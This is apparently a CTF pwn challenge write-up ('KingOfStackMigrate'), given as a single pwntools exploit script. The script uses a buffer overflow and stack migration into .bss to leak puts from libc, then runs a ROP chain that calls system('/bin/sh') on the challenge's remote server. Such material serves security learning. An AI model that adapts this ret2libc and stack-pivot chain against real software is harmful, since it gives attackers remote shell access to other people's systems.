CTF Binary-[Pwn挑战题]-KingOfStackMigrate[Score=3] WP

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
elf=ELF("./pwn")
libc=ELF("/home/eva/Desktop/glibc-all-in-one/libs/2.35-0ubuntu3.11_amd64/libc.so.6")
#p=process("./pwn")
p=remote("nc1.ctfplus.cn",45020)

leave_ret=0x4011c8
pop_rdi_ret=0x401146
ret=0x401016
read_addr=0x40119E
main_addr=0x40114B
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

bss_addr=elf.bss()
new_stack1=bss_addr+0x500
new_stack2=bss_addr+0x800

payload1 = b'a'*0x80
payload1 += p64(new_stack1)
payload1 += p64(read_addr)

p.recvuntil(b"migrate?\n")
p.send(payload1)

rop1 = flat(
new_stack1,
pop_rdi_ret,
puts_got,
puts_plt,
main_addr
)
rop1 = rop1.ljust(0x80,b'\x00')
rop1 += p64(new_stack1-0x80)
rop1 += p64(leave_ret)

p.send(rop1)

p.recvuntil(b"Good luck.\n")
p.recvuntil(b"Good luck.\n")

puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
log.info(f"puts_real_addr: {hex(puts_addr)}")

libc_base=puts_addr-libc.sym["puts"]
system_addr=libc_base+libc.sym["system"]
bin_sh_addr=libc_base+next(libc.search(b"/bin/sh"))

log.info(f"libc_base: {hex(libc_base)}")
log.info(f"system_addr: {hex(system_addr)}")
log.info(f"bin_sh_addr: {hex(bin_sh_addr)}")

payload2 = b'A'*0x80
payload2 += p64(new_stack2)
payload2 += p64(read_addr)

p.recvuntil(b"migrate?\n")
p.send(payload2)

rop2 = flat(
new_stack2,
ret,
pop_rdi_ret,
bin_sh_addr,
system_addr
)
rop2 = rop2.ljust(0x80, b'\x00')
rop2 += p64(new_stack2 - 0x80)
rop2 += p64(leave_ret)

p.send(rop2)

p.interactive()